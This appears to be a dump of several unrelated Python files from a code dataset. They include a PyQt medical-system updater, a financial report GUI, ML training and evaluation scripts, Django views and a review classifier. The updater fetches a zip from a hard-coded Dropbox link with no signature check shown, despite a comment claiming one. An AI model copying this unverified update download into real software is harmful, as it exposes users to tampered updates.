os.stat(file_name).st_mtime\n\n return os.stat(file_name).st_mtime\n\n def _update_files(self):\n row_count = self.ui.tableWidget_file_list.rowCount()\n self.ui.progressBar.setMaximum(row_count)\n\n for row_no in range(row_count):\n self.ui.progressBar.setValue(row_no)\n source_dir = self.ui.tableWidget_file_list.item(row_no, 1).text()\n dest_dir = self.ui.tableWidget_file_list.item(row_no, 2).text()\n\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n\n source_file_name = os.path.join(source_dir, self.ui.tableWidget_file_list.item(row_no, 0).text())\n dest_file_name = os.path.join(dest_dir, 
self.ui.tableWidget_file_list.item(row_no, 0).text())\n\n shutil.copy2(source_file_name, dest_file_name)\n\n @staticmethod\n def _message_box(title, message, hint):\n msg_box = QMessageBox()\n msg_box.setIcon(QMessageBox.Information)\n msg_box.setWindowTitle(title)\n msg_box.setText(message)\n msg_box.setInformativeText(hint)\n msg_box.setStandardButtons(QMessageBox.NoButton)\n\n return msg_box\n\n def _download_file_thread(self, out_queue):\n QtCore.QCoreApplication.processEvents()\n\n url = 'https://www.dropbox.com/s/4h4a35ygzqx7duc/pymedical.zip?dl=1'\n u = urllib.request.urlopen(url)\n data = u.read()\n u.close()\n download_file_name = 'pymedical.zip'\n with open(download_file_name, \"wb\") as f:\n f.write(data)\n\n out_queue.put(download_file_name)\n\n # 取得安全簽章\n def _check_downloaded_file(self):\n title = '下載更新檔'\n message = '正在下載醫療系統更新檔, 請稍後...'\n hint = '正在與更新檔資料庫連線, 會花費一些時間.'\n msg_box = self._message_box(title, message, hint)\n msg_box.show()\n\n msg_queue = Queue()\n QtCore.QCoreApplication.processEvents()\n\n t = Thread(target=self._download_file_thread, args=(msg_queue, ))\n t.start()\n download_file_name = msg_queue.get()\n msg_box.close()\n\n self._check_files(download_file_name)\n","sub_path":"system_update.py","file_name":"system_update.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525208614","text":"\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n FAptReport - RunScriptGui\n \n (c) Copyright 2010 by Sungard FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n\n-------------------------------------------------------------------------------------------------------\"\"\"\nimport os\nimport glob\nimport re\nimport acm\nimport FRunScriptGUI\nimport FLogger\nimport FAptTest\nimport FAptReportUtils\nimport FAptReportGenerate\nimport FAptReportCommon\n\nlogger = FLogger.FLogger.GetLogger('APT')\n\nfalseTrue = ['False', 'True']\n\nclass FAptReport(FRunScriptGUI.AelVariablesHandler):\n \"\"\"class representing gui\"\"\"\n \n GUI_PARAMS = {'runButtonLabel': '&&Run Report',\n 'hideExtraControls': False,\n 'windowCaption' : __name__}\n \n class Parameters( object ):\n \"\"\"class holding gui parameter names and values\"\"\"\n \n REPORT_NAME = 'report_name' \n FACTOR_MODEL = 'factor_model' \n PORTFOLIO = 'portfolio'\n TRADE_FILTER = 'trade_filter'\n HIDE_ZERO_UNIT_ROWS = 'hide_zero_unit_rows'\n HIDE_ZERO_PRICE_ROWS = 'hide_zero_price_rows'\n LAUNCH_APT = 'launch_apt'\n FUND_OF_FUNDS = 'fund_of_funds'\n SUB_PORT_JOB = 'sub_port_job'\n GROUPER = 'grouper'\n COMPOSITION_FILE = 'composition_file'\n UNIVERSE_FILE = 'universe_file'\n \n LOG_LEVEL = 'log_level'\n LOG_FILE = 'log_file'\n\n \n LOG_LEVEL_MAP = {'info':1, 'debug':2, 'warn':3, 'error':4, 'critical':5}\n\n \n def __init__( self, p):\n self.report_name = p.get(FAptReport.Parameters.REPORT_NAME)\n self.factor_model = p.get(FAptReport.Parameters.FACTOR_MODEL)\n self.portfolios = list(p.get(FAptReport.Parameters.PORTFOLIO))\n self.trade_filters = list(p.get(FAptReport.Parameters.TRADE_FILTER))\n self.groupers = p.get(FAptReport.Parameters.GROUPER)\n self.hide_zero_unit_rows = p.get(FAptReport.Parameters.HIDE_ZERO_UNIT_ROWS)\n self.hide_zero_price_rows = p.get(FAptReport.Parameters.HIDE_ZERO_PRICE_ROWS)\n self.launch_apt = p.get(FAptReport.Parameters.LAUNCH_APT)\n \n self.composition_file = p.get(FAptReport.Parameters.COMPOSITION_FILE)\n self.universe_file = 
p.get(FAptReport.Parameters.UNIVERSE_FILE)\n\n self.log_level = p.get(FAptReport.Parameters.LOG_LEVEL)\n self.log_file = p.get(FAptReport.Parameters.LOG_FILE)\n\n self.validate_params()\n self.init_logger()\n \n def validate_params(self):\n \"\"\"validate parameters from the GUI\"\"\"\n FAptReport.validate_report_contents(self.portfolios, self.trade_filters)\n FAptReport.validate_output_file(self.composition_file)\n FAptReport.validate_output_file(self.universe_file)\n FAptReport.validate_log_file(self.log_file)\n self.validate_log_level()\n \n\n def validate_log_level(self):\n \"\"\"map log level\"\"\"\n self.log_level = self.__class__.LOG_LEVEL_MAP.get(self.log_level)\n if not self.log_level:\n raise FAptReportUtils.RunScriptGuiValidationError(\"Invalid log level.\") \n\n def init_logger(self):\n \"\"\"reinitialize logger with user preferences\"\"\"\n logger.Reinitialize(level=self.log_level, logToFileAtSpecifiedPath=self.log_file) \n\n\n\n @classmethod\n def get_gui_params( cls ):\n return cls.GUI_PARAMS\n \n @classmethod\n def validate_log_file(cls, filename):\n log_dir, file = os.path.split(filename)\n if log_dir and not os.path.exists(log_dir):\n try:\n os.makedirs(log_dir)\n logger.info(\"Created log directory %s.\", log_dir)\n except Exception as err:\n logger.error(\"Failed to create log directory %s.\", log_dir)\n raise err\n \n @classmethod\n def validate_output_file(cls, filename):\n directory, file = os.path.split(filename)\n if directory and not os.path.exists(directory):\n try:\n os.makedirs(directory)\n logger.info(\"Created directory %s.\", directory)\n except Exception as err:\n logger.error(\"Failed to create directory %s.\", directory)\n raise err\n \n @classmethod\n def validate_report_contents(cls, portfolios, trade_filters):\n if len(portfolios) == 0 and len(trade_filters) == 0:\n raise FAptReportUtils.RunScriptGuiValidationError(\"Portfolio or Trade Filter must be entered to run Apt Report\")\n \n \n def get_factor_models(self):\n #removing dependency to UserPreferences\n #self.factor_models_path = FAptReportCommon.AptDatabasePath.get_database_files_path()\n self.factor_models_path = FAptTest.AptTest._get_apt_models_path()\n try:\n os.chdir(self.factor_models_path)\n return [os.path.splitext(filename)[0] for filename in glob.glob('*.fdb')]\n\n except WindowsError as err:\n logger.warn('The system cannot find the file specified: \"%s\"', str(self.factor_models_path))\n return []\n \n def get_factor_models_names(self):\n factor_models = list(set([re.sub('((?=[A-Z][a-z])|(?<=[a-z])(?=[A-Z])|(?=[(]))', ' ', name[:-8]).lstrip() for name in self.get_factor_models()]))\n if not factor_models:\n factor_models = ['']\n logger.warn(\"Cannot find any Apt factor model file (.fdb) in the specified path: '%s'. 
Using default factor model '%s'\", self.factor_models_path, self.default_factor_model)\n return factor_models\n \n def get_default_factor_model_name(self):\n default_factor_model = FAptReportUtils.FAptReportParameters().get('DEFAULT_FACTOR_MODEL')\n default_factor_model = re.sub(' ', '', default_factor_model)\n if default_factor_model:\n return re.sub('((?=[A-Z][a-z])|(?<=[a-z])(?=[A-Z])|(?=[(]))', ' ', default_factor_model).lstrip()\n return self.get_factor_models_names()[0]\n\n def __init__(self):\n self.default_factor_model = self.get_default_factor_model_name()\n factor_models = self.get_factor_models_names()\n vars = [\n #Report tab\n [FAptReport.Parameters.REPORT_NAME, 'Report Name_Report', 'string',\n None, \"APT Report\", 1, 0, 'Enter report name', None, 1], \n [FAptReport.Parameters.FACTOR_MODEL, 'Factor Model_Report', 'string',\n factor_models, self.default_factor_model, 1, 0, 'Select factor model', None, 1],\n [FAptReport.Parameters.PORTFOLIO, 'Portfolio_Report', 'FPhysicalPortfolio',\n \"\", None, 0, 1, 'Select Portfolio', None, 1],\n [FAptReport.Parameters.TRADE_FILTER, 'Trade Filter_Report', 'FTradeSelection',\n \"\", None, 0, 1, 'Select Trade Filter', None, 1],\n [FAptReport.Parameters.GROUPER, 'Grouper_Report', 'FStoredPortfolioGrouper',\n \"\", None, 0, 1, 'Select Grouper', None, 1],\n [FAptReport.Parameters.HIDE_ZERO_UNIT_ROWS, 'Exclude Zero Unit Rows_Report', 'string', falseTrue, 'True', 1, 0, \n 'Excludes zero unit rows from the Apt Report ', None, 1],\n [FAptReport.Parameters.HIDE_ZERO_PRICE_ROWS, 'Exclude Zero Price Rows_Report', 'string', falseTrue, 'True', 1, 0,\n 'Excludes invalid price rows from the Apt Report ', None, 1],\n [FAptReport.Parameters.LAUNCH_APT, 'Start APTPro_Report', 'string', falseTrue, 'True', 1, 0,\n 'Starts APTPro ', None, 1],\n \n #Output tab\n [FAptReport.Parameters.COMPOSITION_FILE, 'Composition File_Output:', 'string',\n \"\", FAptReportUtils.FAptPath.get_composition_path(), 1, 0, 'Path for writing the composition file.', None, 1],\n [FAptReport.Parameters.UNIVERSE_FILE, 'Universe File_Output:', 'string',\n \"\", FAptReportUtils.FAptPath.get_universe_path(), 1, 0, 'Path for writing the universe file.', None, 1],\n \n #Log tab\n [FAptReport.Parameters.LOG_LEVEL, 'Log Level_Log:', 'string',\n ['info', 'debug', 'warn', 'error', 'critical'], 'info', 1, 0, 'Log level', None, 1],\n [FAptReport.Parameters.LOG_FILE, 'Log File_Log:', 'string',\n \"\", FAptReportUtils.FAptPath.get_apt_report_log_path(), 1, 0, 'Log file path', None, 1],\n \n ]\n\n FRunScriptGUI.AelVariablesHandler.__init__(self, vars)\n \n \nael_variables = FAptReport()\nael_variables.LoadDefaultValues(__name__)\nael_gui_parameters = FAptReport.get_gui_params()\n \ndef ael_main(parameters):\n try:\n params = FAptReport.Parameters(parameters)\n FAptReportGenerate.generate(params)\n except ImportError as err:\n logger.error(str(err))\n except Exception as err:\n logger.ELOG( str(err), exc_info=1 )\n \n\ndef startRunScript(eii):\n acm.RunModuleWithParameters(\"FAptReport\", acm.GetDefaultContext())\n\n","sub_path":"Extensions/AMI APT/FPythonCode/FAptReport.py","file_name":"FAptReport.py","file_ext":"py","file_size_in_byte":9439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"497799053","text":"import torch\nimport numpy as np\nfrom experiment import Experiment \nfrom trainer import predictions \nimport pandas as pd \nfrom sklearn import metrics\nimport torch.nn as nn\n\n\ndef get_best_model_across_seeds(df_search):\n average_scores 
= []\n for score in df_search['best_score']:\n average_scores.append(np.mean(eval(score)))\n df_search[\"average_score\"] = average_scores\n\n\n # get sets of hyperparameters used \n seeds = df_search.seed.unique()\n\n params = pd.DataFrame()\n\n for idx, row in df_search.iterrows():\n params = params.append(row.drop(['savename', 'best_iter', 'seed','average_score', 'best_score']).to_dict(), ignore_index = True)\n # \n params = params.drop_duplicates()\n # index by number of seeds \n best_average_performance = 0 \n best_params = {}\n best_index= 0\n not_done = False\n for i in range(0, len(df_search), len(seeds)):\n try:\n total_perf = 0\n for j in range(len(seeds)):\n total_perf += df_search.average_score[i + j]\n total_perf /= len(seeds)\n if (total_perf > best_average_performance):\n best_average_performance = total_perf \n best_params = df_search.iloc[i].drop(['savename', 'best_iter', 'seed','average_score', 'best_score']).to_dict()\n best_index = i \n except:\n not_done = True \n print(\"Not done training\")\n break\n best_model_info = []\n for k in range(len(seeds)):\n best_model_info.append(df_search.iloc[best_index + k])\n \n return best_model_info, not_done \n\ndef get_best_model_info(df_search):\n average_scores = []\n for score in df_search['best_score']:\n average_scores.append(np.mean(eval(score)))\n df_search[\"average_score\"] = average_scores\n \n print(df_search.columns)\n \n# get sets of hyperparameters used \n df_search_sorted = df_search.sort_values('average_score', ascending=False).head()\n \n \n for idx, row in df_search_sorted.iterrows():\n params = row.drop(['savename', 'best_iter', 'seed','average_score', 'best_score']).to_dict()\n\n best_model_info = df_search_sorted.iloc[0]\n return best_model_info\n\ndef load_best_model(best_model_info, device, config_str, model_type, model_name, load_filename=None):\n if load_filename is None:\n savename = best_model_info['savename']\n split = savename.split('/')\n split[-1] = 'best_' + split[-1]\n load_filename = '/'.join(split)\n \n # Assumption: the checkpoint is a torch-serialized dict (its keys and the\n # load_state_dict call below imply this); the original code used 'checkpoint'\n # without ever loading it, which raised a NameError.\n checkpoint = torch.load(load_filename, map_location=device)\n \n try:\n _iter = checkpoint['_iter']\n except:\n _iter = checkpoint['_epoch']\n print(\"Loaded checkpoint (trained for {} iterations)\".format(_iter))\n \n try:\n params = best_model_info[[\"momentum\", \"seed\", \"lr\", \"batch_size\", \"augmentation\"]]\n except:\n params = best_model_info[[\"seed\", \"lr\", \"batch_size\", \"augmentation\"]]\n\n params = params.to_dict()\n \n params_alt = {}\n \n for key, value in params.items():\n if (type(value) == str):\n params_alt[key] = [eval(value)]\n else:\n params_alt[key] = [value]\n\n exp = Experiment(None, device, config_str, model_type, model_name, params_alt, None, None)\n\n model, criterion, optimizer = exp._get_model(best_model_info['seed'], params)\n model = nn.DataParallel(model)\n model.load_state_dict(checkpoint['state_dict'])\n \n model.to(device)\n \n return checkpoint, model, criterion,exp \n\ndef get_test_predictions(model, criterion, device, te_loader, task=None, model_name=None, get_all_predictions = False):\n model.eval()\n running_pred = []\n running_pred_image = []\n running_pred_ehr = []\n pt_ids = []\n y_orig_all = []\n with torch.no_grad():\n for X, y, pt_id in te_loader:\n for p in pt_id:\n pt_ids.append(p)\n if (type(X) is list):\n for i in range(len(X)):\n X[i] = X[i].to(device).half()\n y = y.to(device).half()\n else: \n X,y = X.to(device).half(), y.to(device).half()\n\n# print(\"model name:\", model_name)\n if (\"bias_\" in model_name[0:5]):\n \n output = model(X) \n# print(\"prediction shape:\", output[0].shape, 
output[1].shape)\n if (get_all_predictions):\n predicted = (predictions(output[0].data), predictions(output[1].data))\n running_pred_image.append((predicted[0].data.detach().cpu().numpy(), y.data.detach().cpu().numpy()))\n running_pred_ehr.append((predicted[1].data.detach().cpu().numpy(), X[1].data.detach().cpu().numpy()))\n y_pred_image, y_true_image = zip(*running_pred_image)\n y_pred_ehr, y_true_ehr = zip(*running_pred_ehr)\n y_pred = (y_pred_image, y_pred_ehr)\n y_true = (y_true_image, y_true_ehr)\n\n else:\n predicted = predictions(output[0].data)\n running_pred.append((predicted.data.detach().cpu().numpy(), y.data.detach().cpu().numpy()))\n y_pred, y_true = zip(*running_pred)\n\n else:\n output = torch.squeeze(model(X))\n# print(output)\n y = torch.squeeze(y)\n\n # mask loss \n# output[y<0] = y[y<0]\n\n predicted = predictions(output.data)\n\n running_pred.append((predicted.data.detach().cpu().numpy(), y.data.detach().cpu().numpy()))\n y_pred, y_true = zip(*running_pred)\n return y_true, y_pred, pt_ids\n \n \n\ndef save_test_predictions(checkpoint_str, pts, y_true, y_score, model_name):\n import pathlib\n pathlib.Path('./output/{}/'.format(checkpoint_str)).mkdir(parents=True, exist_ok=True)\n \n fname = './output/{}/'.format(checkpoint_str)\n \n np.savez(\n open(fname, 'wb'),\n y_score = y_score,\n y_true = y_true,\n pts = pts,\n )\n \n print('Test predictions saved to', fname)\n\n \ndef calc_roc(y_true, y_pred, pt_ids):\n \n\n unique_pt_ids = np.unique(pt_ids)\n unique_predictions = []\n unique_truth_values = []\n for pt_id in unique_pt_ids:\n indices = np.where(pt_ids == pt_id)[0]\n\n if(len(y_pred[indices]) == 1):\n unique_predictions.append(y_pred[indices][0])\n unique_truth_values.append(y_true[indices][0])\n else:\n unique_predictions.append(np.average(y_pred[indices], axis = 0))\n unique_truth_values.append(np.average(y_true[indices], axis = 0))\n \n unique_predictions = np.squeeze(np.array(unique_predictions))\n\n unique_truth_values = np.squeeze(np.array(unique_truth_values))\n\n \n# mask loss \n unique_predictions[unique_truth_values<0] = unique_truth_values[unique_truth_values<0]\n if (len(y_pred.shape) == 1):\n y_pred = np.expand_dims(y_pred, axis = 1) \n n_classes = y_pred.shape[1]\n# print(\"num classes:\", n_classes)\n score = []\n\n if (n_classes == 1):\n score.append(metrics.roc_auc_score(unique_truth_values.astype(int), unique_predictions))\n else:\n for n in range(n_classes):\n try:\n score.append(metrics.roc_auc_score(unique_truth_values[:,n].astype(int), unique_predictions[:,n]))\n except:\n score.append(0.5)\n return score, unique_predictions, unique_truth_values, unique_pt_ids","sub_path":"evaluate/.ipynb_checkpoints/evaluate_models-checkpoint.py","file_name":"evaluate_models-checkpoint.py","file_ext":"py","file_size_in_byte":7510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"485834987","text":"from django.contrib.auth.forms import AuthenticationForm\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom .forms import *\n\n\ndef login(request):\n if request.user.is_authenticated():\n print('hi')\n return redirect('core:home')\n\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n print('hello')\n redirect_url = request.GET.get('next', reverse('core:home'))\n auth_login(request, form.get_user())\n return 
redirect(redirect_url)\n\n else:\n form = AuthenticationForm()\n\n return render(request, 'core/login.html', {'login_form': form})\n\n\ndef register(request):\n if request.user.is_authenticated():\n return redirect('core:home')\n\n if request.method == 'POST':\n form = RegistrationForm(data=request.POST)\n\n if form.is_valid():\n new_member = form.save()\n new_member.save()\n return redirect('core:login')\n\n else:\n form = RegistrationForm()\n\n return render(request, 'core/register.html',\n {'register_form': form})\n\n\ndef logout(request):\n auth_logout(request)\n return redirect('core:home')\n\n\ndef home(request):\n return render(request, 'core/home.html')\n","sub_path":"mysite/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"609904257","text":"# coding: utf-8\n\ns = input().rstrip().split(\" \")\nd = [int(s[0]), int(s[1])]\n\ncnt = 0\n\nfor n in d:\n if n > 5:\n cnt += 5\n else:\n cnt += n\n\nprint(cnt)\n","sub_path":"src/paiza/d/D050.py","file_name":"D050.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"132004798","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nimport matplotlib.pyplot as plt\nimport mxnet as mx\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.gluon import loss as gloss, nn\nfrom mxnet.gluon import data as gdata\nfrom common_mx import *\n\ndef vgg_block(num_convs, num_channels):\n blk = nn.Sequential()\n for _ in range(num_convs):\n blk.add(nn.Conv2D(num_channels, kernel_size=3, padding=1),\n nn.BatchNorm(), nn.Activation('relu'))\n blk.add(nn.MaxPool2D(pool_size=1, strides=2))\n return blk\n\ndef vgg(vgg_arch_tuple):\n net = nn.Sequential()\n\n for num_convs, num_channels in vgg_arch_tuple:\n net.add(vgg_block(num_convs, num_channels))\n\n net.add(nn.Dense(4096), nn.Dropout(0.5),\n nn.BatchNorm(), nn.Activation('relu'),\n nn.Dense(4096), nn.Dropout(0.5),\n nn.BatchNorm(), nn.Activation('relu'),\n nn.Dense(10))\n return net\n\n\n\nif __name__=='__main__':\n if len(sys.argv) < 2:\n print(\"pls enter training epochs num\")\n raise SystemExit(1)\n\n batch_size=100\n train_data_batched, test_data_batched = load_data_fashion_mnist(batch_size=batch_size)\n vgg_11_arch_tuple = ((1, 16), (1, 32), (2, 64), (2, 128), (2, 128))\n vgg_11 = vgg(vgg_11_arch_tuple)\n\n '''\n X = nd.random.uniform(shape=(100, 1, 28, 28))\n vgg_11.initialize()\n for blk in vgg_11:\n X = blk(X)\n print(blk.name, 'output shape:\\t', X.shape)\n '''\n lr = 0.05\n num_epochs = int(sys.argv[1])\n vgg_11.initialize(force_reinit=True, init=init.Xavier(), ctx=ctx)\n trainer = gluon.Trainer(vgg_11.collect_params(), 'sgd', {'learning_rate': lr})\n test_acc_list = do_train(net=vgg_11, \n train_iter=train_data_batched, test_iter=test_data_batched, \n batch_size=batch_size, trainer=trainer, \n num_epochs=num_epochs, ctx=ctx)\n pkl_file = os.path.basename(__file__).split('.')[0] + '.pkl'\n with open(pkl_file, 'wb') as pkl_f:\n pickle.dump(test_acc_list, pkl_f)\n \n\n \n","sub_path":"es_mxnet_imp/vgg_batchnorm.py","file_name":"vgg_batchnorm.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"77658965","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx=0\ny=0\nd=[0]\nn=int(sys.argv[1])\na=2*np.pi*np.random.random(n)\n\nfor i in range(n):\n 
s=np.sin(a[i])\n c=np.cos(a[i])\n x=x+s\n y=y+c\n u=np.sqrt((x**2)+(y**2))\n d.append(u)\n plt.plot(d)\n\nax = plt.axes()\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_title(\"Movimiento Browniano, \"+str(n)+\" iteraciones\")\n\nfilename = 'Browniano_2D_'+str(n) \nplt.savefig(filename + '.pdf',format = 'pdf', transparent=False)\n \n","sub_path":"Python/Browniano_2D.py","file_name":"Browniano_2D.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"513622398","text":"#!/usr/bin/env python\n\nimport argparse\nparser = argparse.ArgumentParser(prog=\"regions.py\", description=\"Identify region zones.\")\nparser.add_argument(\"file\", help=\"JSON file containing the data, model, and residual.\")\nparser.add_argument(\"--sigma\", type=float, default=4.0, help=\"Sigma clipping threshold.\")\nparser.add_argument(\"--sigma0\", type=float, default=2.0, help=\"How close (in AA) regions are allowed to be next to each other.\")\nargs = parser.parse_args()\n\nimport Starfish\nimport json\nimport numpy as np\nfrom astropy.stats import sigma_clip\nfrom operator import itemgetter\n\nf = open(args.file, \"r\")\nread = json.load(f) # read is a dictionary\nf.close()\n\nwl = np.array(read[\"wl\"])\n# data = np.array(read[\"data\"])\n# model = np.array(read[\"model\"])\nresiduals = np.array(read[\"resid\"])\nspectrum_id = read[\"spectrum_id\"]\norder = read[\"order\"]\n\n# array that specifies if a pixel is already covered.\n# to start, it should be all False\ncovered = np.zeros((len(wl),), dtype='bool')\n\n# #average all of the spectra in the deque together\n# residual_array = np.array(self.resid_deque)\n# if len(self.resid_deque) == 0:\n# raise RuntimeError(\"No residual spectra stored yet.\")\n# else:\n# residuals = np.average(residual_array, axis=0)\n\n# run the sigma_clip algorithm until converged, and we've identified the outliers\nfiltered_data = sigma_clip(residuals, sig=args.sigma, iters=None)\nmask = filtered_data.mask\n\n# sigma0 = config['region_priors']['sigma0']\n# logAmp = config[\"region_params\"][\"logAmp\"]\n# sigma = config[\"region_params\"][\"sigma\"]\n\n# Sort in decreasing strength of residual\nnregions = 0\nmus = []\n\nfor w, resid in sorted(zip(wl[mask], np.abs(residuals[mask])), key=itemgetter(1), reverse=True):\n if w in wl[covered]:\n continue\n else:\n # check to make sure region is not *right* at the edge of the echelle order\n if w <= np.min(wl) or w >= np.max(wl):\n continue\n else:\n # instantiate region and update coverage\n\n # Default amp and sigma values\n mus.append(w) # for evaluating the mu prior\n nregions += 1\n\n # determine the stretch of wl covered by this new region\n ind = (wl >= (w - args.sigma0)) & (wl <= (w + args.sigma0))\n # update the covered regions\n covered = covered | ind\n\n# Save the mu's to file.\nmy_dict = {\"mus\":sorted(mus), \"spectrum_id\":spectrum_id, \"order\":order}\nfname = Starfish.specfmt.format(spectrum_id, order) + \"regions.json\"\nf = open(fname, 'w')\njson.dump(my_dict, f, indent=2, sort_keys=True)\nf.close()\n","sub_path":"scripts/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"159275388","text":"import re, nltk, pickle, argparse\nimport os, sys\nimport data_helper\nimport features\n\n\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB, BernoulliNB\nimport sklearn, numpy\nimport pandas 
as pd\nimport random\nfrom sklearn import tree\nfrom nltk.classify import SklearnClassifier\n\n\n\n\nDATA_DIR = \"data\"\n\nrandom.seed(10)\n\n\nMODEL_DIR = \"models/\"\nOUTPUT_DIR = \"output/\"\nFEATURES_DIR = \"features/\"\n\ndef select_features(classifier):\n best = (0.0, 16384)\n best_features = classifier.most_informative_features(10000)\n \n selected_features = set([fname for fname, value in best_features[:best[1]]])\n temp_train,dis = build_features(\"train_examples.tsv\",\"word_features\")\n train_data = []\n for rev in temp_train:\n temp_dic={}\n for key,value in rev[0].items():\n if key in selected_features:\n temp_dic.update({key:value}) \n train_data.append((temp_dic,rev[1]))\n classifier = nltk.NaiveBayesClassifier.train(train_data)\n #write_features_category(train_data, \"save_feat.txt\")\n return classifier\n\ndef build_features(data_file, feat_name, save_feats=None):\n # read text data\n positive_texts, negative_texts = data_helper.get_reviews(os.path.join(DATA_DIR, data_file))\n\n category_texts = {\"positive\": positive_texts, \"negative\": negative_texts}\n\n # build features\n features_category_tuples, texts = features.get_features_category_tuples(category_texts, feat_name)\n\n # save features to file\n #if save_feats is not None:\n # features_category_tuples = select_features(features_category_tuples)\n # write_features_category(features_category_tuples, save_feats)\n\n return features_category_tuples, texts\n#def get_sel_feat(file):\n\n\ndef train_model(model):\n train_data=\"train_examples.tsv\"\n feat_file=\"data/save_feat.txt\"\n f = open(feat_file, 'r')\n l = f.readlines()\n feats=[]\n for line in l:\n #print(line)\n sent_r = r\"([^\\s]+)\"\n dic_r= r\"\\{([^}]+)\\}\"\n key_r=r\"([^\\s]+)\"\n sent = re.findall(sent_r, line)[0]\n #print(sent)\n dic = re.findall(dic_r,line)[0]\n dic = dic[0:len(dic)]\n # print(dic)\n dic_list = dic.split(\",\")\n #print(dic_list)\n feat_dic = {}\n for stuff in dic_list:\n pair = re.findall(key_r,stuff)\n key = pair[0][1:len(pair[0])-2]\n val = pair[1]\n #print(key+\":\"+val)\n feat_dic.update({key:int(val)})\n feats.append((feat_dic,sent))\n #print(feats)\n model.train(feats)\n return model\ndef get_we_feat(file):\n feat,text=build_features(file,\"word_features\")\n feat_list = []\n i=0\n for rev in text:\n\n w2v_feat=features.get_word_embedding_features(rev)\n feat_list.append((w2v_feat,feat[i][1]))\n i+=1\n return feat_list,text\n\ndef train_word_embem_model(model):\n train_data=\"train_examples.tsv\"\n feat_list,throw_out=get_we_feat(train_data)\n model.train(feat_list)\n return model\ndef build_classifier(classifier_name):\n \"\"\"\n Accepted names: nb, dt, svm, sk_nb, sk_dt, sk_svm\n\n svm and sk_svm will return the same type of classifier.\n\n :param classifier_name:\n :return:\n \"\"\"\n if classifier_name == \"nb\":\n cls = nltk.classify.NaiveBayesClassifier\n elif classifier_name == \"nb_sk\":\n cls = SklearnClassifier(BernoulliNB())\n elif classifier_name == \"dt\":\n cls = nltk.classify.DecisionTreeClassifier\n elif classifier_name == \"dt_sk\":\n cls = SklearnClassifier(tree.DecisionTreeClassifier())\n elif classifier_name == \"svm_sk\" or classifier_name == \"svm\":\n cls = SklearnClassifier(svm.SVC())\n else:\n assert False, \"unknown classifier name:{}; known names: nb, dt, svm, nb_sk, dt_sk, svm_sk\".format(classifier_name)\n\n return cls\n\n\ndef evaluate(classifier, features_category_tuples, reference_text, data_set_name=None):\n\n # test on the data\n accuracy = nltk.classify.accuracy(classifier, 
features_category_tuples)\n\n\n #accuracy_results_file = open(\"{}_results.txt\".format(data_set_name), 'w', encoding='utf-8')\n #accuracy_results_file.write('Results of {}:\\n\\n'.format(data_set_name))\n #accuracy_results_file.write(\"{0:10s} {1:8.5f}\\n\\n\".format(\"Accuracy\", accuracy))\n\n features_only = []\n reference_labels = []\n for feature_vectors, category in features_category_tuples:\n features_only.append(feature_vectors)\n reference_labels.append(category)\n\n predicted_labels = classifier.classify_many(features_only)\n\n confusion_matrix = nltk.ConfusionMatrix(reference_labels, predicted_labels)\n\n #accuracy_results_file.write(str(confusion_matrix))\n #accuracy_results_file.write('\\n\\n')\n #accuracy_results_file.close()\n\n #predict_results_file = open(\"{}_output.txt\".format(data_set_name), 'w', encoding='utf-8')\n #for reference, predicted, text in zip(\n # reference_labels,\n # predicted_labels,\n # reference_text\n #):\n # if reference != predicted:\n # predict_results_file.write(\"{0} {1}\\n{2}\\n\\n\".format(reference, predicted, text))\n #predict_results_file.close()\n\n return accuracy, confusion_matrix\n\ndef main(reviews,output):\n model=build_classifier(\"svm\")\n model = train_word_embem_model(model)\n file = open(output,\"w+\")\n dev_data = \"dev_examples.tsv\"\n dev_feats,dev_text= get_we_feat(dev_data)\n #print(dev_feats)\n acc, cm = evaluate(model,dev_feats,dev_text)\n # Assumption: the -r argument is the root directory of review files to classify;\n # the original code referenced 'path' without ever defining it (NameError).\n path = reviews\n dir_list = os.listdir(path)\n for d in dir_list:\n file_list = os.listdir(path+d)\n for f in file_list:\n texts= data_helper.get_reviews(os.path.join(path,d,f))\n \n for text in texts:\n w2v_feat=features.get_word_embedding_features(text) \n file.write(model.classify(w2v_feat)+ \" \"+text+\"\\n\")\n \n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Assignment 3')\n parser.add_argument('-r', dest=\"reviews\", default=None, required=False,\n help='The file with the reviews in it to be classified.')\n parser.add_argument('-p', dest=\"pred_file\", default=\"predictions.txt\", required=False,\n help='The file to write predictions to.')\n\n args = parser.parse_args()\n main(args.reviews, args.pred_file)\n","sub_path":"CS143/asg4/restaurant-competition-P2.py","file_name":"restaurant-competition-P2.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"241412047","text":"import math\nimport time\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom 